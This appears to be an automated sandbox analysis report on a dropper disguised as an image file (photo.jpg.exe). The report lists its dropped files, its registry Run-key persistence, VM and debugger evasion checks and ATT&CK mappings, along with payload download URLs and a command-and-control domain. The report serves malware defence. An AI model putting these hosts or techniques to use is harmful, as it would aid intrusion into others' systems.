Source: Binary string: D:\Workspace\p-2ed35f15174943f6b676502b51f53d81\Output\TASLogin.pdbTT source: TASLogin.exe, 0000000E.00000000.1321310909.0000000000454000.00000002.00000001.01000000.0000000E.sdmp, TASLogin.exe, 00000014.00000000.1425365427.0000000000454000.00000002.00000001.01000000.0000000E.sdmp, TASLogin.exe, 00000019.00000000.1510046802.0000000000454000.00000002.00000001.01000000.0000000E.sdmp, TASLogin.exe.0.dr

Data Obfuscation

Source: photo.jpg.exe, ----------.cs; .Net Code: _000A_0004_0006_0007_0005_0005_0001_0006
Source: photo.jpg.exe, ------.cs; .Net Code: _0003_000B_0008_0005_0003_0008_0002_000C
Source: initial sample; Static PE information: section where entry point is pointing to: .ace
Source: photo.jpg.exe; Static PE information: real checksum: 0x46cc2 should be: 0x4dd80
Source: TASLogin.exe.0.dr; Static PE information: section name: .ace
Source: TASLogin.exe.0.dr; Static PE information: section name: .ace
Source: TASLogin.exe.0.dr; Static PE information: section name: .ace
Source: TASLogin.exe.0.dr; Static PE information: section name: .ace
Source: TASLogin.exe.0.dr; Static PE information: section name: .tvm0
Source: TASLogin.exe.0.dr; Static PE information: section name: .ace
Source: TASLogin.exe.0.dr; Static PE information: section name: .ace
Source: TASLoginBase.dll.0.dr; Static PE information: section name: .]<_
Source: commonbase.dll.0.dr; Static PE information: section name: .didata
Source: commonbase.dll.0.dr; Static PE information: section name: .FCh
Source: TASLogin.exe.0.dr; Static PE information: section name: .ace entropy: 7.998385208344043
Source: TASLogin.exe.0.dr; Static PE information: section name: .tvm0 entropy: 7.996916032178618
Source: TASLogin.exe.0.dr; Static PE information: section name: .ace entropy: 7.9770180518325455
Source: C:\Users\user\Desktop\photo.jpg.exe; File created: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\commonbase.dll
Source: C:\Users\user\Desktop\photo.jpg.exe; File created: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exe
Source: C:\Users\user\Desktop\photo.jpg.exe; File created: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLoginBase.dll
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exe; Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run TASLogin

Hooking and other Techniques for Hiding and Protection

Source: Possible double extension: jpg.exe; Static PE information: photo.jpg.exe
Source: C:\Users\user\Desktop\photo.jpg.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exe; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exe; Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exe; Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\photo.jpg.exe; Memory allocated: 8E0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\photo.jpg.exe; Memory allocated: 26B0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\photo.jpg.exe; Memory allocated: A00000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\photo.jpg.exe; Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\photo.jpg.exe; Window / User API: threadDelayed 2554
Source: C:\Users\user\Desktop\photo.jpg.exe; Window / User API: threadDelayed 7281
Source: C:\Users\user\Desktop\photo.jpg.exe TID: 3040; Thread sleep time: -22136092888451448s >= -30000s
Source: C:\Users\user\Desktop\photo.jpg.exe TID: 3040; Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Desktop\photo.jpg.exe TID: 6232; Thread sleep count: 2554 > 30
Source: C:\Users\user\Desktop\photo.jpg.exe TID: 6232; Thread sleep count: 7281 > 30
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exe; Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exe; Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809
Source: C:\Users\user\Desktop\photo.jpg.exe; Thread delayed: delay time: 30000
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exe; File opened: C:\Users\user\AppData\Roaming
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exe; File opened: C:\Users\user\AppData
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exe; File opened: C:\Users\user
Source: TASLogin.exe, 00000019.00000002.1533709727.00000000006E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}a3
Source: TASLogin.exe, 00000019.00000002.1533709727.00000000006E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll3
Source: TASLogin.exe, 00000014.00000002.1454050456.0000000000578000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: TASLogin.exe, 00000014.00000002.1454050456.0000000000578000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b};
Source: photo.jpg.exe, 00000000.00000002.1337389667.0000000005E05000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:MA
Source: photo.jpg.exe, 00000000.00000002.1324529798.000000000097E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllb
Source: TASLogin.exe, 0000000E.00000002.1346273792.00000000008DE000.00000004.00000020.00020000.00000000.sdmp, TASLogin.exe, 00000014.00000002.1454050456.0000000000578000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeMemory allocated: page read and write | page guardJump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeProcess created: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exe "C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exe" Jump to behavior
Source: TASLogin.exe, 0000000E.00000002.1347476930.00000000027A0000.00000040.00001000.00020000.00000000.sdmp, TASLogin.exe, 0000000E.00000003.1324625603.000000007F610000.00000004.00001000.00020000.00000000.sdmp, TASLogin.exe, 0000000E.00000002.1349071706.000000007F090000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: Shell_TrayWndTrayNotifyWndSysPagerToolbarWindow32
Source: TASLogin.exe, 0000000E.00000002.1347476930.00000000027A0000.00000040.00001000.00020000.00000000.sdmp, TASLogin.exe, 0000000E.00000003.1324625603.000000007F610000.00000004.00001000.00020000.00000000.sdmp, TASLogin.exe, 0000000E.00000002.1349071706.000000007F090000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: |SysPagerTrayNotifyWndShell_TrayWnd
Source: TASLogin.exe, 0000000E.00000002.1347476930.00000000027A0000.00000040.00001000.00020000.00000000.sdmp, TASLogin.exe, 0000000E.00000003.1324625603.000000007F610000.00000004.00001000.00020000.00000000.sdmp, TASLogin.exe, 0000000E.00000002.1349071706.000000007F090000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: |ProgMan
Source: C:\Users\user\Desktop\photo.jpg.exeQueries volume information: C:\Users\user\Desktop\photo.jpg.exe VolumeInformationJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
Execution: 1 Scheduled Task/Job; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers
Persistence: 1 Scheduled Task/Job; 1 Registry Run Keys / Startup Folder; 1 DLL Side-Loading; Login Hook; Network Logon Script; RC Scripts; Startup Items
Privilege Escalation: 12 Process Injection; 1 Scheduled Task/Job; 1 Registry Run Keys / Startup Folder; 1 DLL Side-Loading; Network Logon Script; RC Scripts; Startup Items
Defense Evasion: 11 Masquerading; 1 Disable or Modify Tools; 41 Virtualization/Sandbox Evasion; 12 Process Injection; 111 Obfuscated Files or Information; 12 Software Packing; 1 DLL Side-Loading
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
Discovery: 111 Security Software Discovery; 1 Process Discovery; 41 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 2 File and Directory Discovery; 22 System Information Discovery; Remote System Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
Command and Control: 1 Encrypted Channel; 1 Non-Standard Port; 1 Ingress Tool Transfer; 2 Non-Application Layer Protocol; 3 Application Layer Protocol; Multiband Communication; Commonly Used Port
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery
[Behavior graph. ID: 1654778; Sample: photo.jpg.pif; Startdate: 02/04/2025; Architecture: WINDOWS; Score: 80. Domains: u.arpuu.com, s3-r-w.ap-southeast-1.amazonaws.com, imagesyd.s3.ap-southeast-1.amazonaws.com. Signatures: Antivirus / Scanner detection for submitted sample; Multi AV Scanner detection for dropped file; Multi AV Scanner detection for submitted file; 4 other signatures. photo.jpg.exe contacted 3.5.146.183 and 3.5.150.100 on port 443 (AMAZON-02US, United States) and 4 other IPs or domains; dropped C:\Users\user\...\commonbase.dll (PE32), C:\Users\user\AppData\...\photo.jpg.exe.log (CSV), C:\Users\user\...\TASLoginBase.dll (PE32) and C:\Users\user\...\TASLogin.exe (PE32); and started TASLogin.exe, which contacted u.arpuu.com 13.208.251.115 on port 3158 (AMAZON-02US, United States). Each of the three TASLogin.exe processes started two WerFault.exe processes.]

Source | Detection | Scanner | Label
photo.jpg.exe | 35% | Virustotal |
photo.jpg.exe | 100% | Avira | TR/Dropper.Gen
SAMPLE | 100% | Joe Sandbox ML |
Source | Detection | Scanner | Label
C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exe | 3% | ReversingLabs |
C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\commonbase.dll | 39% | ReversingLabs | Win32.Adware.RedCap
No Antivirus matches
No Antivirus matches


Name | IP | Active | Malicious | Antivirus Detection | Reputation
s3-r-w.ap-southeast-1.amazonaws.com | 3.5.150.219 | true | false | | high
u.arpuu.com | 13.208.251.115 | true | false | | high
imagesyd.s3.ap-southeast-1.amazonaws.com | unknown | unknown | false | | unknown

Name | Malicious | Antivirus Detection | Reputation
https://imagesyd.s3.ap-southeast-1.amazonaws.com/TASLogin.edskv | false | Avira URL Cloud: safe | unknown
https://imagesyd.s3.ap-southeast-1.amazonaws.com/TASLogin.exe | false | Avira URL Cloud: safe | unknown
https://imagesyd.s3.ap-southeast-1.amazonaws.com/uu.txt | false | Avira URL Cloud: safe | unknown
https://imagesyd.s3.ap-southeast-1.amazonaws.com/image.jpg | false | Avira URL Cloud: safe | unknown
https://imagesyd.s3.ap-southeast-1.amazonaws.com/TASLoginBase.dll | false | Avira URL Cloud: safe | unknown
https://imagesyd.s3.ap-southeast-1.amazonaws.com/TASLogin.txt | false | Avira URL Cloud: safe | unknown
https://imagesyd.s3.ap-southeast-1.amazonaws.com/commonbase.dll | false | Avira URL Cloud: safe | unknown

IP | Domain | Country | ASN | ASN Name | Malicious
52.219.132.99 | unknown | United States | 16509 | AMAZON-02US | false
3.5.146.183 | unknown | United States | 16509 | AMAZON-02US | false
3.5.150.100 | unknown | United States | 16509 | AMAZON-02US | false
52.219.124.23 | unknown | United States | 16509 | AMAZON-02US | false
3.5.150.219 | s3-r-w.ap-southeast-1.amazonaws.com | United States | 16509 | AMAZON-02US | false
52.219.129.35 | unknown | United States | 16509 | AMAZON-02US | false
13.208.251.115 | u.arpuu.com | United States | 16509 | AMAZON-02US | false

Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1654778
Start date and time: 2025-04-02 16:21:27 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 6s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 32
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
  • EGA enabled
  • AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: photo.jpg.exe
(renamed file extension from pif to exe)
Original Sample Name: photo.jpg.pif
Detection: MAL
Classification: mal80.evad.winEXE@11/8@7/7
  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, WerFault.exe, RuntimeBroker.exe, SIHClient.exe, Microsoft.Photos.exe, SgrmBroker.exe, conhost.exe, svchost.exe, ApplicationFrameHost.exe
  • Excluded IPs from analysis (whitelisted): 20.12.23.50, 184.31.69.3
  • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, c.pki.goog, fe3cr.delivery.mp.microsoft.com
  • Not all processes where analyzed, report is missing behavior information
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size getting too big, too many NtDeviceIoControlFile calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Report size getting too big, too many NtReadVirtualMemory calls found.
  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Time | Type | Description
10:22:27 | API Interceptor | 362x Sleep call for process: photo.jpg.exe modified
15:23:12 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run TASLogin C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exe
15:23:20 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run TASLogin C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exe

Match | Associated Sample Name / URL | Detection | Threat Name | Context
52.219.124.23 | picture_20250316.exe.bin.exe | malicious | Unknown |
52.219.129.35 | Pay stub agreement for carlo.triolo.html | malicious | HTMLPhisher |

Match | Associated Sample Name / URL | Detection | Threat Name | Context
u.arpuu.com | SIH Client.exe | malicious | Unknown | 112.121.170.66
u.arpuu.com | SIH Client.exe | malicious | Unknown | 112.121.170.66
u.arpuu.com | SIH Client.exe | malicious | Unknown | 112.121.170.66
u.arpuu.com | SIH Client.exe | malicious | Unknown | 112.121.170.66
u.arpuu.com | picture_20250316.exe.bin.exe | malicious | Unknown | 112.121.170.66
u.arpuu.com | picture_20250316.exe.bin.exe | malicious | Unknown | 112.121.170.66
s3-r-w.ap-southeast-1.amazonaws.com | PWA Identity Proxy.exe | malicious | CobaltStrike | 3.5.150.5
s3-r-w.ap-southeast-1.amazonaws.com | SIH Client.exe | malicious | Unknown | 3.5.150.186
s3-r-w.ap-southeast-1.amazonaws.com | Python Application.exe | malicious | Unknown | 3.5.147.17
s3-r-w.ap-southeast-1.amazonaws.com | PWA Identity Proxy.exe | malicious | Unknown | 3.5.149.145
s3-r-w.ap-southeast-1.amazonaws.com | SIH Client.exe | malicious | Unknown | 3.5.150.142
s3-r-w.ap-southeast-1.amazonaws.com | Python Application.exe | malicious | Unknown | 3.5.146.110
s3-r-w.ap-southeast-1.amazonaws.com | SIH Client.exe | malicious | Unknown | 3.5.146.244
s3-r-w.ap-southeast-1.amazonaws.com | SIH Client.exe | malicious | Unknown | 3.5.150.97
s3-r-w.ap-southeast-1.amazonaws.com | picture_20250316.exe.bin.exe | malicious | Unknown | 3.5.150.157
s3-r-w.ap-southeast-1.amazonaws.com | picture_20250316.exe.bin.exe | malicious | Unknown | 3.5.148.142
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  AMAZON-02USPurchase Order 139022.exeGet hashmaliciousFormBookBrowse
                  • 13.248.169.48
                  -Lysisfinancial_Executives_Schedule 6cLKF4B .svgGet hashmaliciousHTMLPhisherBrowse
                  • 108.138.106.59
                  http://daugavpils.pilseta24.lv/linkredirect/?link=https%3A%2F%2Fmujicconstruction.com%2Fjustdoitforyou%2F123%2FbGF1cmEuYmVyZ21hbkBwb3N0bm9yZC5jb20=&referer=daugavpils.pilseta24.lv%2Fzina%3Fslug%3Deccal-briketes-un-apkures-granulas-ar-lielisku-kvalitati-pievilcigu-cenu-videi-draudzigs-un-izd-8c175fc171&additional_params=%7B%22company_orig_id%22%3A%22267661%22%2C%22object_country_id%22%3A%22lv%22%2C%22referer_layout_type%22%3A%22SR%22%2C%22bannerinfo%22%3A%22%7B%5C%22key%5C%22%3A%5C%22%5C%5C%5C%22Apbed%5C%5Cu012b%5C%5Cu0161anas+nams-krematorija%5C%5C%5C%22%2C+SIA%7C2020-09-11%7C2021-08-23%7Cdaugavpils+p24+lielais+baneris%7Chttps%3A%5C%5C%5C%2F%5C%5C%5C%2Fwww.krematorijariga.lv%5C%5C%5C%2F%7C%7Cupload%5C%5C%5C%2F267661%5C%5C%5C%2Fbaners%5C%5C%5C%2F1184_krematorija_980x90.gif%7Clva%7C267661%7C980%7C90%7C%7C0%7C0%7C%7C0%7C0%7C%5C%22%2C%5C%22doc_count%5C%22%3A1%2C%5C%22key0%5C%22%3A%5C%22%5C%5C%5C%22Apbed%5C%5Cu012b%5C%5Cu0161anas+nams-krematorija%5C%5C%5C%22%2C+SIA%5C%22%2C%5C%22key1%5C%22%3A%5C%222020-09-11%5C%22%2C%5C%22key2%5C%22%3A%5C%222021-08-23%5C%22%2C%5C%22key3%5C%22%3A%5C%22daugavpils+p24+lielais+baneris%5C%22%2C%5C%22key4%5C%22%3A%5C%22https%3A%5C%5C%5C%2F%5C%5C%5C%2Fwww.krematorijariga.lv%5C%5C%5C%2F%5C%22%2C%5C%22key5%5C%22%3A%5C%22%5C%22%2C%5C%22key6%5C%22%3A%5C%22upload%5C%5C%5C%2F267661%5C%5C%5C%2Fbaners%5C%5C%5C%2F1184_krematorija_980x90.gif%5C%22%2C%5C%22key7%5C%22%3A%5C%22lva%5C%22%2C%5C%22key8%5C%22%3A%5C%22267661%5C%22%2C%5C%22key9%5C%22%3A%5C%22980%5C%22%2C%5C%22key10%5C%22%3A%5C%2290%5C%22%2C%5C%22key11%5C%22%3A%5C%22%5C%22%2C%5C%22key12%5C%22%3A%5C%220%5C%22%2C%5C%22key13%5C%22%3A%5C%220%5C%22%2C%5C%22key14%5C%22%3A%5C%22%5C%22%2C%5C%22key15%5C%22%3A%5C%220%5C%22%2C%5C%22key16%5C%22%3A%5C%220%5C%22%2C%5C%22key17%5C%22%3A%5C%22%5C%22%7D%22%7D&control=494d2e7146aade77cb8a9ef0fd1fd133Get hashmaliciousHTMLPhisherBrowse
                  • 13.216.34.24
                  na.elfGet hashmaliciousPrometeiBrowse
                  • 34.249.145.219
                  invoice#U007e990121.exeGet hashmaliciousFormBookBrowse
                  • 13.248.169.48
                  na.elfGet hashmaliciousPrometeiBrowse
                  • 34.249.145.219
                  https://polarservicecenters.comGet hashmaliciousUnknownBrowse
                  • 18.238.49.38
                  Re Automatic reply building project plan.msgGet hashmaliciousHTMLPhisherBrowse
                  • 18.217.16.159
                  nqa3yj3p7N.exeGet hashmaliciousVidarBrowse
                  • 18.238.49.124
                  socatGet hashmaliciousUnknownBrowse
                  • 34.249.145.219
                  AMAZON-02USPurchase Order 139022.exeGet hashmaliciousFormBookBrowse
                  • 13.248.169.48
                  -Lysisfinancial_Executives_Schedule 6cLKF4B .svgGet hashmaliciousHTMLPhisherBrowse
                  • 108.138.106.59
                  http://daugavpils.pilseta24.lv/linkredirect/?link=https%3A%2F%2Fmujicconstruction.com%2Fjustdoitforyou%2F123%2FbGF1cmEuYmVyZ21hbkBwb3N0bm9yZC5jb20=&referer=daugavpils.pilseta24.lv%2Fzina%3Fslug%3Deccal-briketes-un-apkures-granulas-ar-lielisku-kvalitati-pievilcigu-cenu-videi-draudzigs-un-izd-8c175fc171&additional_params=%7B%22company_orig_id%22%3A%22267661%22%2C%22object_country_id%22%3A%22lv%22%2C%22referer_layout_type%22%3A%22SR%22%2C%22bannerinfo%22%3A%22%7B%5C%22key%5C%22%3A%5C%22%5C%5C%5C%22Apbed%5C%5Cu012b%5C%5Cu0161anas+nams-krematorija%5C%5C%5C%22%2C+SIA%7C2020-09-11%7C2021-08-23%7Cdaugavpils+p24+lielais+baneris%7Chttps%3A%5C%5C%5C%2F%5C%5C%5C%2Fwww.krematorijariga.lv%5C%5C%5C%2F%7C%7Cupload%5C%5C%5C%2F267661%5C%5C%5C%2Fbaners%5C%5C%5C%2F1184_krematorija_980x90.gif%7Clva%7C267661%7C980%7C90%7C%7C0%7C0%7C%7C0%7C0%7C%5C%22%2C%5C%22doc_count%5C%22%3A1%2C%5C%22key0%5C%22%3A%5C%22%5C%5C%5C%22Apbed%5C%5Cu012b%5C%5Cu0161anas+nams-krematorija%5C%5C%5C%22%2C+SIA%5C%22%2C%5C%22key1%5C%22%3A%5C%222020-09-11%5C%22%2C%5C%22key2%5C%22%3A%5C%222021-08-23%5C%22%2C%5C%22key3%5C%22%3A%5C%22daugavpils+p24+lielais+baneris%5C%22%2C%5C%22key4%5C%22%3A%5C%22https%3A%5C%5C%5C%2F%5C%5C%5C%2Fwww.krematorijariga.lv%5C%5C%5C%2F%5C%22%2C%5C%22key5%5C%22%3A%5C%22%5C%22%2C%5C%22key6%5C%22%3A%5C%22upload%5C%5C%5C%2F267661%5C%5C%5C%2Fbaners%5C%5C%5C%2F1184_krematorija_980x90.gif%5C%22%2C%5C%22key7%5C%22%3A%5C%22lva%5C%22%2C%5C%22key8%5C%22%3A%5C%22267661%5C%22%2C%5C%22key9%5C%22%3A%5C%22980%5C%22%2C%5C%22key10%5C%22%3A%5C%2290%5C%22%2C%5C%22key11%5C%22%3A%5C%22%5C%22%2C%5C%22key12%5C%22%3A%5C%220%5C%22%2C%5C%22key13%5C%22%3A%5C%220%5C%22%2C%5C%22key14%5C%22%3A%5C%22%5C%22%2C%5C%22key15%5C%22%3A%5C%220%5C%22%2C%5C%22key16%5C%22%3A%5C%220%5C%22%2C%5C%22key17%5C%22%3A%5C%22%5C%22%7D%22%7D&control=494d2e7146aade77cb8a9ef0fd1fd133 | Get hash | malicious | HTMLPhisher | Browse
                  • 13.216.34.24
                  na.elf | Get hash | malicious | Prometei | Browse
                  • 34.249.145.219
                  invoice#U007e990121.exe | Get hash | malicious | FormBook | Browse
                  • 13.248.169.48
                  na.elf | Get hash | malicious | Prometei | Browse
                  • 34.249.145.219
                  https://polarservicecenters.com | Get hash | malicious | Unknown | Browse
                  • 18.238.49.38
                  Re Automatic reply building project plan.msg | Get hash | malicious | HTMLPhisher | Browse
                  • 18.217.16.159
                  nqa3yj3p7N.exe | Get hash | malicious | Vidar | Browse
                  • 18.238.49.124
                  socat | Get hash | malicious | Unknown | Browse
                  • 34.249.145.219
                  Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                  3b5074b1b5d032e5620f69f9f700ff0e
                  Request For RFQ-STACK120774-Handel GmbH 253736803-2024.7z | Get hash | malicious | MSIL Logger, MassLogger RAT | Browse
                  • 3.5.150.219
                  Zapytanie AXCES PRODUCTION SP. Z O.O32523624522523514Birkeses.cmd | Get hash | malicious | Remcos, GuLoader | Browse
                  • 3.5.150.219
                  Purchase order0204.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse
                  • 3.5.150.219
                  ZPZ1v1jD1L.ps1 | Get hash | malicious | Vidar | Browse
                  • 3.5.150.219
                  mymindtpgnme.txt.ps1 | Get hash | malicious | Unknown | Browse
                  • 3.5.150.219
                  700815a50547b01b29cf3a1ca55d7a7e3058e7d911072018.html.ps1 | Get hash | malicious | LummaC Stealer | Browse
                  • 3.5.150.219
                  Request For RFQ-STACK120774-Handel GmbH 253736803-2024.js | Get hash | malicious | MSIL Logger, MassLogger RAT | Browse
                  • 3.5.150.219
                  F5xfA5bLBN.exe | Get hash | malicious | LummaC Stealer | Browse
                  • 3.5.150.219
                  Request For RFQ-STACK120774-Handel GmbH 253736803-2024.js | Get hash | malicious | MSIL Logger, MassLogger RAT | Browse
                  • 3.5.150.219
                  s-hell.ps1 | Get hash | malicious | Unknown | Browse
                  • 3.5.150.219
                  Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                  C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exe
                  SIH Client.exe | Get hash | malicious | Unknown | Browse
                  SIH Client.exe | Get hash | malicious | Unknown | Browse
                  SIH Client.exe | Get hash | malicious | Unknown | Browse
                  SIH Client.exe | Get hash | malicious | Unknown | Browse
                  picture_20250316.exe.bin.exe | Get hash | malicious | Unknown | Browse
                  picture_20250316.exe.bin.exe | Get hash | malicious | Unknown | Browse
                  #U56fe#U7247_20250218.exe | Get hash | malicious | Nitol | Browse
                  #U56fe#U7247_20250218.exe | Get hash | malicious | Nitol | Browse
                                  Process:C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exe
                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Archive, ctime=Wed Apr 2 13:23:07 2025, mtime=Wed Apr 2 13:23:10 2025, atime=Wed Apr 2 13:23:09 2025, length=995560, window=hide
                                  Category:dropped
                                  Size (bytes):1125
                                  Entropy (8bit):4.921576202840761
                                  Encrypted:false
                                  SSDEEP:24:8m3VPa3yUAgcpAMpAk0uiS6gcrFgclFxgOqygm:8m3VP2XrMql4QuiiLyg
                                  MD5:9422EB2976709CE6BDDB65101E8947B5
                                  SHA1:720D1EC857D0C0BACF8C2D9E8C3CD96FF5C30B89
                                  SHA-256:594E1C5FD2218B1D86FF4C4C032D9DB672911FE72D3007D3B317DB019C910F5D
                                  SHA-512:C0817C77DA10821BDE081EF598E762CFB4F448BE1F31BACC308E56850E6AB772AA7BD60EB9083BEF73B600B3CF2782B4B0558B48D6A65F888AED8AC302A62496
                                  Malicious:false
                                  Reputation:low
